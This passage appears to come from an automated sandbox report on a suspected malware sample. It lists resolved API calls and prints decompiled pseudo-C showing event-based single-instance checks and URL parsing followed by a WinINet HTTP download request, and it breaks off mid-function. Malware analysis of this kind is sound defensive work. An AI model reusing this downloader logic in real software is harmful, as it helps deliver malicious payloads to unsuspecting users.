                                        0x29da8eeb
                                        0x29da8ef2
                                        0x29da8ef8
                                        0x29da8efe
                                        0x29da8f06
                                        0x29da8f0b
                                        0x29da8f11
                                        0x29da8f17
                                        0x29da8f1c
                                        0x29da8f23
                                        0x29da8f29
                                        0x29da8f2f
                                        0x29da8f34
                                        0x29da8f3b
                                        0x29da8f41
                                        0x29da8f47
                                        0x29da8f4f
                                        0x29da8f54
                                        0x29da8f5a
                                        0x29da8f60
                                        0x29da8f65
                                        0x29da8f6c
                                        0x29da8f72
                                        0x29da8f78
                                        0x29da8f7d
                                        0x29da8f84
                                        0x29da8f8a
                                        0x29da8f90
                                        0x29da8f98
                                        0x29da8f9d
                                        0x29da8fa3
                                        0x29da8fa9
                                        0x29da8fae
                                        0x29da8fb5
                                        0x29da8fbb
                                        0x29da8fc1
                                        0x29da8fc6
                                        0x29da8fd3
                                        0x29da8fd3
                                        0x29da8fd8
                                        0x29da8fdf
                                        0x29da8fe1
                                        0x29da8fe9
                                        0x29da8fef
                                        0x29da8ff5
                                        0x29da8ffa
                                        0x29da9001
                                        0x29da9007
                                        0x29da900d
                                        0x29da9015
                                        0x29da9020
                                        0x29da9020
                                        0x29da9025
                                        0x29da902c
                                        0x29da902e
                                        0x29da9036
                                        0x29da903c
                                        0x29da9042
                                        0x29da9047
                                        0x29da904e
                                        0x29da9054
                                        0x29da905a
                                        0x29da9062
                                        0x29da906d
                                        0x29da906d
                                        0x29da9072
                                        0x29da9079
                                        0x29da907f
                                        0x29da9087
                                        0x29da908d
                                        0x29da9093
                                        0x29da9098
                                        0x29da909f
                                        0x29da90a5
                                        0x29da90ab
                                        0x29da90b3
                                        0x29da90b8
                                        0x29da90be
                                        0x29da90c4
                                        0x29da90c9
                                        0x29da90d0
                                        0x29da90d6
                                        0x29da90dc
                                        0x29da90e1
                                        0x29da90e8
                                        0x29da90ee
                                        0x29da90f4
                                        0x29da90fc
                                        0x29da9107
                                        0x29da9107
                                        0x29da910c
                                        0x29da9113
                                        0x29da9115
                                        0x29da9123
                                        0x29da9123
                                        0x29da9128
                                        0x29da912f
                                        0x29da9135
                                        0x29da913d
                                        0x29da9143
                                        0x29da9149
                                        0x29da914e
                                        0x29da9155
                                        0x29da915b
                                        0x29da9161
                                        0x29da9166
                                        0x29da916d
                                        0x29da9173
                                        0x29da9179
                                        0x29da9181
                                        0x29da9186
                                        0x29da918c
                                        0x29da9192
                                        0x29da9197
                                        0x29da919e
                                        0x29da91a4
                                        0x29da91aa
                                        0x29da91af
                                        0x29da91b6
                                        0x29da91bc
                                        0x29da91c2
                                        0x29da91ca
                                        0x29da91cf
                                        0x29da91d5
                                        0x29da91db
                                        0x29da91e0
                                        0x29da91e7
                                        0x29da91ed
                                        0x00000000
                                        0x29da91ed
                                        0x29da91f2

                                        APIs
                                        • GetProcAddress.KERNEL32(74AB0000,015A20E8), ref: 29DA83A5
                                        • GetProcAddress.KERNEL32(74AB0000,015A2B58), ref: 29DA83BD
                                        • GetProcAddress.KERNEL32(74AB0000,015A2268), ref: 29DA83D6
                                        • GetProcAddress.KERNEL32(74AB0000,01596B88), ref: 29DA83EE
                                        • GetProcAddress.KERNEL32(74AB0000,015A2298), ref: 29DA8406
                                        • GetProcAddress.KERNEL32(74AB0000,015A2C78), ref: 29DA841F
                                        • GetProcAddress.KERNEL32(74AB0000,015A22B0), ref: 29DA8437
                                        • GetProcAddress.KERNEL32(74AB0000,015A2310), ref: 29DA844F
                                        • GetProcAddress.KERNEL32(74AB0000,015A2100), ref: 29DA8468
                                        • GetProcAddress.KERNEL32(74AB0000,015A2148), ref: 29DA8480
                                        • GetProcAddress.KERNEL32(74AB0000,015A2130), ref: 29DA8498
                                        • GetProcAddress.KERNEL32(74AB0000,015A22C8), ref: 29DA84B1
                                        • GetProcAddress.KERNEL32(74AB0000,015A2178), ref: 29DA84C9
                                        • GetProcAddress.KERNEL32(74AB0000,015A2B38), ref: 29DA84E1
                                        • GetProcAddress.KERNEL32(74AB0000,015A22E0), ref: 29DA84FA
                                        • GetProcAddress.KERNEL32(74AB0000,015A2190), ref: 29DA8512
                                        • GetProcAddress.KERNEL32(74AB0000,015A21A8), ref: 29DA852A
                                        • GetProcAddress.KERNEL32(74AB0000,015A2BD8), ref: 29DA8543
                                        • GetProcAddress.KERNEL32(74AB0000,015A2280), ref: 29DA855B
                                        • GetProcAddress.KERNEL32(74AB0000,015A20D0), ref: 29DA8573
                                        • GetProcAddress.KERNEL32(74AB0000,015A2370), ref: 29DA858C
                                        • GetProcAddress.KERNEL32(74AB0000,015A2328), ref: 29DA85A4
                                        • GetProcAddress.KERNEL32(74AB0000,015A2388), ref: 29DA85BC
                                        • GetProcAddress.KERNEL32(74AB0000,015A22F8), ref: 29DA85D5
                                        • GetProcAddress.KERNEL32(74AB0000,015A21F0), ref: 29DA85ED
                                        • GetProcAddress.KERNEL32(74AB0000,015A2208), ref: 29DA8605
                                        • GetProcAddress.KERNEL32(74AB0000,015A2220), ref: 29DA861E
                                        • GetProcAddress.KERNEL32(74AB0000,015A2C18), ref: 29DA8636
                                        • GetProcAddress.KERNEL32(74AB0000,015A4808), ref: 29DA864E
                                        • GetProcAddress.KERNEL32(74AB0000,015A49D0), ref: 29DA8667
                                        • GetProcAddress.KERNEL32(74AB0000,015A2958), ref: 29DA867F
                                        • GetProcAddress.KERNEL32(74AB0000,01597100), ref: 29DA8697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: P5Ts
                                        • API String ID: 2238633743-3744616211
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E29D94697() {
                                        				CHAR** _t25;
                                        				CHAR* _t26;
                                        				CHAR* _t28;
                                        				CHAR* _t31;
                                        				void* _t33;
                                        				int _t43;
                                        				void* _t50;
                                        				void* _t55;
                                        				void* _t56;
                                        				void* _t64;
                                        
                                        				_t26 =  *_t25;
                                        				lstrcatA(_t55 - 0x3f8, _t26);
                                        				 *(_t55 - 4) = _t43;
                                        				if( *((intOrPtr*)(_t55 - 0x890)) >= _t50) {
                                        					_push( *((intOrPtr*)(_t55 - 0x8a4)));
                                        					E29DADF3B();
                                        					_t56 = _t56 + 4;
                                        				}
                                        				_t28 = E29DA3460(_t43, _t50, _t55 - 0x8a4); // executed
                                        				 *(_t55 - 4) = 2;
                                        				if(_t28[0x14] >= _t50) {
                                        					_t28 =  *_t28;
                                        				}
                                        				lstrcatA(_t55 - 0x3f8, _t28);
                                        				 *(_t55 - 4) = _t43;
                                        				_t60 =  *((intOrPtr*)(_t55 - 0x890)) - _t50;
                                        				if( *((intOrPtr*)(_t55 - 0x890)) >= _t50) {
                                        					_push( *((intOrPtr*)(_t55 - 0x8a4)));
                                        					E29DADF3B();
                                        					_t56 = _t56 + 4;
                                        				}
                                        				_t31 = E29DA2E90(_t55 - 0x7fc, _t60); // executed
                                        				 *(_t55 - 4) = 3;
                                        				if(_t31[0x14] >= _t50) {
                                        					_t31 =  *_t31;
                                        				}
                                        				lstrcatA(_t55 - 0x3f8, _t31);
                                        				 *(_t55 - 4) = _t43;
                                        				if( *((intOrPtr*)(_t55 - 0x7e8)) >= _t50) {
                                        					_push( *(_t55 - 0x7fc));
                                        					E29DADF3B();
                                        				}
                                        				 *((intOrPtr*)(_t55 - 0x7e8)) = 0xf;
                                        				 *(_t55 - 0x7ec) = _t43;
                                        				 *(_t55 - 0x7fc) = _t43;
                                        				_t33 = OpenEventA(0x1f0003, _t43, _t55 - 0x3f8);
                                        				 *0x29dd82f0 = _t33;
                                        				if(_t33 == _t43) {
                                        					L13:
                                        					 *0x29dd82f0 = CreateEventA(_t43, _t43, _t43, _t55 - 0x3f8);
                                        					if(_t64 != 0 && _t64 == 0) {
                                        					}
                                        					E29D93E30(); // executed
                                        				} else {
                                        					do {
                                        						CloseHandle(_t33);
                                        						Sleep(0x1388);
                                        						_t33 = OpenEventA(0x1f0003, _t43, _t55 - 0x3f8);
                                        						 *0x29dd82f0 = _t33;
                                        						_t64 = _t33 - _t43;
                                        					} while (_t64 != 0);
                                        					goto L13;
                                        				}
                                        			}














                                        APIs
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D946A1
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D946DF
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9471D
                                        • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 29D94761
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 29D94771
                                        • Sleep.KERNEL32(00001388,?,?), ref: 29D9477C
                                        • OpenEventA.KERNEL32(001F0003,?,?,?,?), ref: 29D9478F
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 29D947A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventlstrcat$Open$CloseCreateHandleSleep
                                        • String ID: .exe$HTTPA$StdV7$big$com$edit.zip$nalyzer$snow$stone$=>
                                        • API String ID: 3327642776-2641624048
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E29D91560(void* __eflags, char* _a4, char* _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, char* _a40, intOrPtr _a60) {
                                        				long _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				void _v276;
                                        				void _v2276;
                                        				long _v2284;
                                        				long _v2288;
                                        				char* _v2304;
                                        				long _v2312;
                                        				void* _v2316;
                                        				char _v2332;
                                        				intOrPtr _v2340;
                                        				DWORD* _v2344;
                                        				char _v2360;
                                        				long _v2368;
                                        				void* _v2372;
                                        				char* _v2388;
                                        				long _v2396;
                                        				void* _v2400;
                                        				char* _v2416;
                                        				long _v2424;
                                        				DWORD* _v2428;
                                        				char _v2444;
                                        				long _v2452;
                                        				void* _v2456;
                                        				char _v2472;
                                        				long _v2480;
                                        				void* _v2484;
                                        				char _v2500;
                                        				long _v2508;
                                        				void* _v2512;
                                        				char _v2528;
                                        				long _v2536;
                                        				void* _v2540;
                                        				char _v2556;
                                        				intOrPtr _v2564;
                                        				DWORD* _v2568;
                                        				char _v2584;
                                        				long _v2588;
                                        				void* _v2592;
                                        				long _v2596;
                                        				char _v2600;
                                        				char* _v2604;
                                        				void* _v2608;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t381;
                                        				signed int _t382;
                                        				void* _t387;
                                        				long _t389;
                                        				void* _t391;
                                        				signed int _t392;
                                        				long _t395;
                                        				char** _t396;
                                        				char** _t407;
                                        				long _t411;
                                        				char** _t413;
                                        				void* _t416;
                                        				char** _t420;
                                        				long _t424;
                                        				char** _t426;
                                        				char** _t431;
                                        				char* _t433;
                                        				char* _t435;
                                        				char* _t437;
                                        				char* _t439;
                                        				short _t440;
                                        				char* _t441;
                                        				signed int _t442;
                                        				intOrPtr _t444;
                                        				char* _t458;
                                        				void* _t459;
                                        				char* _t461;
                                        				void* _t462;
                                        				void* _t464;
                                        				char* _t467;
                                        				int _t469;
                                        				void* _t472;
                                        				int _t487;
                                        				signed int _t488;
                                        				void* _t490;
                                        				int _t493;
                                        				char* _t496;
                                        				void* _t497;
                                        				signed int _t525;
                                        				signed int _t526;
                                        				signed int _t527;
                                        				signed int _t528;
                                        				signed int _t529;
                                        				signed int _t530;
                                        				short _t531;
                                        				void* _t533;
                                        				void* _t534;
                                        				char* _t541;
                                        				char* _t589;
                                        				char* _t590;
                                        				intOrPtr _t593;
                                        				long _t606;
                                        				void* _t607;
                                        				void* _t620;
                                        				void* _t621;
                                        				void* _t626;
                                        				long _t629;
                                        				long _t641;
                                        				char* _t642;
                                        				void* _t644;
                                        				signed int _t647;
                                        				intOrPtr _t648;
                                        				signed int _t655;
                                        				void* _t656;
                                        				void* _t658;
                                        				void* _t659;
                                        				void* _t661;
                                        				void* _t662;
                                        
                                        				_t662 = __eflags;
                                        				_push(0xffffffff);
                                        				_push(E29DC290B);
                                        				_push( *[fs:0x0]);
                                        				_t381 =  *0x29dd5664; // 0xd9555f04
                                        				_t382 = _t381 ^ _t655;
                                        				_v20 = _t382;
                                        				_push(_t382);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v2604 = _a4;
                                        				_v2588 = 0;
                                        				_v8 = 1;
                                        				_v2480 = 0xf;
                                        				_v2484 = 0;
                                        				_v2500 = 0;
                                        				E29D892C0( &_v2500, 0x29dcd617, 0);
                                        				_v2368 = 0xf;
                                        				_v2372 = 0;
                                        				_v2388 = 0;
                                        				_v2396 = 0xf;
                                        				_v2400 = 0;
                                        				_v2416 = 0;
                                        				_v2312 = 0xf;
                                        				_v2316 = 0;
                                        				_v2332 = 0;
                                        				_v2508 = 0xf;
                                        				_v2512 = 0;
                                        				_v2528 = 0;
                                        				_v2452 = 0xf;
                                        				_v2456 = 0;
                                        				_v2472 = 0;
                                        				_v2536 = 0xf;
                                        				_v2540 = 0;
                                        				_v2556 = 0;
                                        				_v8 = 8;
                                        				_v2592 = 0;
                                        				_t387 = E29D914B0( &_a8,  &_v2360, _t662,  &_v2360);
                                        				_t658 = _t656 - 0xa20 + 4;
                                        				_v8 = 9;
                                        				E29D891D0(_t387,  &_v2332);
                                        				_v8 = 8;
                                        				if(_v2340 >= 0x10) {
                                        					_push(_v2360);
                                        					E29DADF3B();
                                        					_t658 = _t658 + 4;
                                        				}
                                        				_t626 = _v2316;
                                        				_t606 = 8;
                                        				if(_t626 >= 8) {
                                        					_t389 = 8;
                                        				} else {
                                        					_t606 = _t626;
                                        					_t389 = _t626;
                                        				}
                                        				_t589 = _v2332;
                                        				if(_v2312 < 0x10) {
                                        					_t589 =  &_v2332;
                                        				}
                                        				if(E29D8E7D0(_t389, "https://", _t589) != 0 || _t606 < 8 || (0 | _t606 != 0x00000008) != 0) {
                                        					_t607 = 7;
                                        					__eflags = _t626 - 7;
                                        					if(_t626 >= 7) {
                                        						_t391 = 7;
                                        					} else {
                                        						_t607 = _t626;
                                        						_t391 = _t626;
                                        					}
                                        					__eflags = _v2312 - 0x10;
                                        					_t590 = _v2332;
                                        					if(_v2312 < 0x10) {
                                        						_t590 =  &_v2332;
                                        					}
                                        					_t392 = E29D8E7D0(_t391, "http://", _t590);
                                        					__eflags = _t392;
                                        					if(_t392 == 0) {
                                        						__eflags = _t607 - 7;
                                        						if(_t607 >= 7) {
                                        							_t607 - 7 = _t607 == 7;
                                        							if(_t607 == 7) {
                                        								_v2592 = 7;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_v2592 = 8;
                                        				}
                                        				_v2600 = 0x2f;
                                        				_t395 = E29D95240(_v2592 + 1,  &_v2332,  &_v2600, 1);
                                        				_v2596 = _t395;
                                        				if(_t395 != 0xffffffff) {
                                        					_t396 = E29D951E0(_v2596,  &_v2332,  &_v2444, 0xffffffff);
                                        					_v8 = 0xb;
                                        					_t525 = 2;
                                        				} else {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D892C0( &_v2304, 0x29dcd617, 0);
                                        					_t396 =  &_v2304;
                                        					_v8 = 0xa;
                                        					_t525 = 1;
                                        				}
                                        				_v2588 = _t525;
                                        				E29D891D0(_t396,  &_v2388);
                                        				if((_t525 & 0x00000002) != 0) {
                                        					_t525 = _t525 & 0xfffffffd;
                                        					_v2588 = _t525;
                                        					if(_v2424 >= 0x10) {
                                        						_push(_v2444);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2424 = 0xf;
                                        					_v2428 = 0;
                                        					_v2444 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t525 & 0x00000001) != 0) {
                                        					_t525 = _t525 & 0xfffffffe;
                                        					_v2588 = _t525;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        				}
                                        				_t629 = _v2596;
                                        				_t398 = _v2332;
                                        				_t593 = _v2312;
                                        				_t541 = _v2332;
                                        				if(_t629 == 0xffffffff) {
                                        					__eflags = _t593 - 0x10;
                                        					if(_t593 < 0x10) {
                                        						_t541 =  &_v2332;
                                        					}
                                        					_t542 = _t541 + _v2316;
                                        					__eflags = _t541 + _v2316;
                                        				} else {
                                        					if(_t593 < 0x10) {
                                        						_t541 =  &_v2332;
                                        					}
                                        					_t542 = _t541 + _t629;
                                        				}
                                        				if(_t593 < 0x10) {
                                        					_t398 =  &_v2332;
                                        				}
                                        				_push(_v2608);
                                        				_v2284 = 0xf;
                                        				_v2288 = 0;
                                        				_v2304 = 0;
                                        				E29D95660( &_v2304, _t398 + _v2592, _t542);
                                        				_v8 = 0xc;
                                        				E29D891D0( &_v2304,  &_v2416);
                                        				_v8 = 8;
                                        				if(_v2284 >= 0x10) {
                                        					_push(_v2304);
                                        					E29DADF3B();
                                        					_t658 = _t658 + 4;
                                        				}
                                        				if(E29D95240(0,  &_v2388, "#", 1) == 0xffffffff) {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D894C0( &_v2304,  &_v2388, 0, 0xffffffff);
                                        					_t407 =  &_v2304;
                                        					_v8 = 0xe;
                                        					_t526 = _t525 | 0x00000008;
                                        					__eflags = _t526;
                                        				} else {
                                        					_t407 = E29D951E0(0,  &_v2388,  &_v2360, _t404);
                                        					_v8 = 0xd;
                                        					_t526 = _t525 | 0x00000004;
                                        				}
                                        				_v2588 = _t526;
                                        				E29D891D0(_t407,  &_v2388);
                                        				if((_t526 & 0x00000008) != 0) {
                                        					_t526 = _t526 & 0xfffffff7;
                                        					_v2588 = _t526;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t526 & 0x00000004) != 0) {
                                        					_t526 = _t526 & 0xfffffffb;
                                        					_v2588 = _t526;
                                        					if(_v2340 >= 0x10) {
                                        						_push(_v2360);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        				}
                                        				_t411 = E29D95240(0,  &_v2416, ":", 1);
                                        				_v2596 = _t411;
                                        				if(_t411 == 0xffffffff) {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D892C0( &_v2304, 0x29dcd617, 0);
                                        					_t413 =  &_v2304;
                                        					_v8 = 0x10;
                                        					_t527 = _t526 | 0x00000020;
                                        					__eflags = _t527;
                                        				} else {
                                        					_t130 = _t411 + 1; // 0x1
                                        					_t413 = E29D951E0(_t130,  &_v2416,  &_v2360, 0xffffffff);
                                        					_v8 = 0xf;
                                        					_t527 = _t526 | 0x00000010;
                                        				}
                                        				_v2588 = _t527;
                                        				E29D891D0(_t413,  &_v2472);
                                        				if((_t527 & 0x00000020) != 0) {
                                        					_t527 = _t527 & 0xffffffdf;
                                        					_v2588 = _t527;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t527 & 0x00000010) != 0) {
                                        					_t527 = _t527 & 0xffffffef;
                                        					_v2588 = _t527;
                                        					if(_v2340 >= 0x10) {
                                        						_push(_v2360);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        				}
                                        				_t415 = _v2596;
                                        				if(_v2596 == 0xffffffff) {
                                        					_t415 = _v2400;
                                        				}
                                        				_t596 =  &_v2416;
                                        				_t416 = E29D951E0(0,  &_v2416,  &_v2360, _t415);
                                        				_v8 = 0x11;
                                        				E29D891D0(_t416,  &_v2416);
                                        				_v8 = 8;
                                        				if(_v2340 >= 0x10) {
                                        					_push(_v2360);
                                        					E29DADF3B();
                                        					_t658 = _t658 + 4;
                                        				}
                                        				_t418 = _v2592;
                                        				if(_v2592 <= 0) {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D892C0( &_v2304, 0x29dcd617, 0);
                                        					_t420 =  &_v2304;
                                        					_v8 = 0x13;
                                        					_t528 = _t527 | 0x00000080;
                                        					__eflags = _t528;
                                        				} else {
                                        					_t596 =  &_v2332;
                                        					_t420 = E29D951E0(0,  &_v2332,  &_v2360, _t418 + 0xfffffffd);
                                        					_v8 = 0x12;
                                        					_t528 = _t527 | 0x00000040;
                                        				}
                                        				_v2588 = _t528;
                                        				E29D891D0(_t420,  &_v2528);
                                        				if(_t528 < 0) {
                                        					_t528 = _t528 & 0xffffff7f;
                                        					_v2588 = _t528;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t528 & 0x00000040) != 0) {
                                        					_t528 = _t528 & 0xffffffbf;
                                        					_v2588 = _t528;
                                        					if(_v2340 >= 0x10) {
                                        						_t596 = _v2360;
                                        						_push(_v2360);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        				}
                                        				_t424 = E29D95240(0,  &_v2388, "?", 1);
                                        				_v2596 = _t424;
                                        				if(_t424 == 0xffffffff) {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D892C0( &_v2304, 0x29dcd617, 0);
                                        					_t426 =  &_v2304;
                                        					_v8 = 0x15;
                                        					_t529 = _t528 | 0x00000200;
                                        					__eflags = _t529;
                                        				} else {
                                        					_t191 = _t424 + 1; // 0x1
                                        					_t596 =  &_v2388;
                                        					_t426 = E29D951E0(_t191,  &_v2388,  &_v2360, 0xffffffff);
                                        					_v8 = 0x14;
                                        					_t529 = _t528 | 0x00000100;
                                        				}
                                        				_v2588 = _t529;
                                        				E29D891D0(_t426,  &_v2556);
                                        				if((_t529 & 0x00000200) != 0) {
                                        					_t529 = _t529 & 0xfffffdff;
                                        					_v2588 = _t529;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t529 & 0x00000100) != 0) {
                                        					_t529 = _t529 & 0xfffffeff;
                                        					_v2588 = _t529;
                                        					if(_v2340 >= 0x10) {
                                        						_t596 = _v2360;
                                        						_push(_v2360);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        				}
                                        				_t428 = _v2596;
                                        				if(_v2596 == 0xffffffff) {
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        					E29D894C0( &_v2304,  &_v2388, 0, 0xffffffff);
                                        					_t431 =  &_v2304;
                                        					_v8 = 0x17;
                                        					_t530 = _t529 | 0x00000800;
                                        					__eflags = _t530;
                                        				} else {
                                        					_t596 =  &_v2388;
                                        					_t431 = E29D951E0(0,  &_v2388,  &_v2444, _t428);
                                        					_v8 = 0x16;
                                        					_t530 = _t529 | 0x00000400;
                                        				}
                                        				_v2588 = _t530;
                                        				E29D891D0(_t431,  &_v2388);
                                        				if((_t530 & 0x00000800) != 0) {
                                        					_t530 = _t530 & 0xfffff7ff;
                                        					if(_v2284 >= 0x10) {
                                        						_push(_v2304);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2284 = 0xf;
                                        					_v2288 = 0;
                                        					_v2304 = 0;
                                        				}
                                        				_v8 = 8;
                                        				if((_t530 & 0x00000400) != 0) {
                                        					if(_v2424 >= 0x10) {
                                        						_t596 = _v2444;
                                        						_push(_v2444);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2424 = 0xf;
                                        					_v2428 = 0;
                                        					_v2444 = 0;
                                        				}
                                        				_t433 = _v2416;
                                        				if(_v2396 < 0x10) {
                                        					_t433 =  &_v2416;
                                        				}
                                        				DeleteUrlCacheEntry(_t433); // executed
                                        				_t435 = _a8;
                                        				if(_a28 < 0x10) {
                                        					_t435 =  &_a8;
                                        				}
                                        				DeleteUrlCacheEntry(_t435); // executed
                                        				if(_a36 == 0) {
                                        					_t437 = _a40;
                                        					__eflags = _a60 - 0x10;
                                        					if(_a60 < 0x10) {
                                        						_t437 =  &_a40;
                                        					}
                                        					_v2592 = InternetOpenA(_t437, 0, 0, 0, 0);
                                        				} else {
                                        					_t496 = E29DA3C40( &_v2444);
                                        					_v8 = 0x18;
                                        					if(_t496[0x14] >= 0x10) {
                                        						_t496 =  *_t496;
                                        					}
                                        					_t497 = InternetOpenA(_t496, 0, 0, 0, 0); // executed
                                        					_v8 = 8;
                                        					_v2592 = _t497;
                                        					if(_v2424 >= 0x10) {
                                        						_push(_v2444);
                                        						E29DADF3B();
                                        						_t658 = _t658 + 4;
                                        					}
                                        					_v2424 = 0xf;
                                        					_v2428 = 0;
                                        					_v2444 = 0;
                                        				}
                                        				_t439 = _v2472;
                                        				if(_v2452 < 0x10) {
                                        					_t439 =  &_v2472;
                                        				}
                                        				_push(_t439);
                                        				_t440 = E29DAEC33();
                                        				_t659 = _t658 + 4;
                                        				_t531 = _t440;
                                        				_t441 = _v2528;
                                        				if(_v2508 < 0x10) {
                                        					_t441 =  &_v2528;
                                        				}
                                        				_t442 =  *0x29dd8550(_t441, "https");
                                        				asm("sbb esi, esi");
                                        				_t641 = ( ~_t442 & 0xff800000) + 0x4800000;
                                        				if(_v2592 == 0) {
                                        					L136:
                                        					_t642 = _v2604;
                                        					 *((intOrPtr*)(_t642 + 0x14)) = 0xf;
                                        					 *(_t642 + 0x10) = 0;
                                        					 *_t642 = 0;
                                        					E29D891D0( &_v2500, _t642);
                                        					__eflags = _v2536 - 0x10;
                                        					if(_v2536 >= 0x10) {
                                        						_t596 = _v2556;
                                        						_push(_v2556);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2536 = 0xf;
                                        					_v2540 = 0;
                                        					_v2556 = 0;
                                        					__eflags = _v2452 - 0x10;
                                        					if(_v2452 >= 0x10) {
                                        						_push(_v2472);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2452 = 0xf;
                                        					_v2456 = 0;
                                        					_v2472 = 0;
                                        					__eflags = _v2508 - 0x10;
                                        					if(_v2508 >= 0x10) {
                                        						_push(_v2528);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2508 = 0xf;
                                        					_v2512 = 0;
                                        					_v2528 = 0;
                                        					__eflags = _v2312 - 0x10;
                                        					if(_v2312 >= 0x10) {
                                        						_t596 = _v2332;
                                        						_push(_v2332);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2312 = 0xf;
                                        					_v2316 = 0;
                                        					_v2332 = 0;
                                        					__eflags = _v2396 - 0x10;
                                        					if(_v2396 >= 0x10) {
                                        						_push(_v2416);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2396 = 0xf;
                                        					_v2400 = 0;
                                        					_v2416 = 0;
                                        					__eflags = _v2368 - 0x10;
                                        					if(_v2368 >= 0x10) {
                                        						_push(_v2388);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2368 = 0xf;
                                        					_v2372 = 0;
                                        					_v2388 = 0;
                                        					__eflags = _v2480 - 0x10;
                                        					if(_v2480 >= 0x10) {
                                        						_t596 = _v2500;
                                        						_push(_v2500);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_v2480 = 0xf;
                                        					_v2484 = 0;
                                        					_v2500 = 0;
                                        					__eflags = _a28 - 0x10;
                                        					if(_a28 >= 0x10) {
                                        						_push(_a8);
                                        						E29DADF3B();
                                        						_t659 = _t659 + 4;
                                        					}
                                        					_a28 = 0xf;
                                        					_a24 = 0;
                                        					_a8 = 0;
                                        					__eflags = _a60 - 0x10;
                                        					if(_a60 >= 0x10) {
                                        						_push(_a40);
                                        						E29DADF3B();
                                        					}
                                        					_t444 = _v2604;
                                        					goto L155;
                                        				} else {
                                        					_t458 = _v2416;
                                        					if(_v2396 < 0x10) {
                                        						_t458 =  &_v2416;
                                        					}
                                        					_t556 = _v2592;
                                        					_t459 = InternetConnectA(_v2592, _t458, _t531, 0, 0, 3, _t641, 0); // executed
                                        					_t621 = _t459;
                                        					_v2608 = _t621;
                                        					if(_t621 == 0) {
                                        						L135:
                                        						InternetCloseHandle(_v2592);
                                        						goto L136;
                                        					} else {
                                        						_t461 = _v2388;
                                        						if(_v2368 < 0x10) {
                                        							_t461 =  &_v2388;
                                        						}
                                        						_t462 = HttpOpenRequestA(_t621, "GET", _t461, 0, 0, 0, _t641, 0); // executed
                                        						_t534 = _t462;
                                        						if(_t534 == 0) {
                                        							L134:
                                        							InternetCloseHandle(_t621);
                                        							goto L135;
                                        						} else {
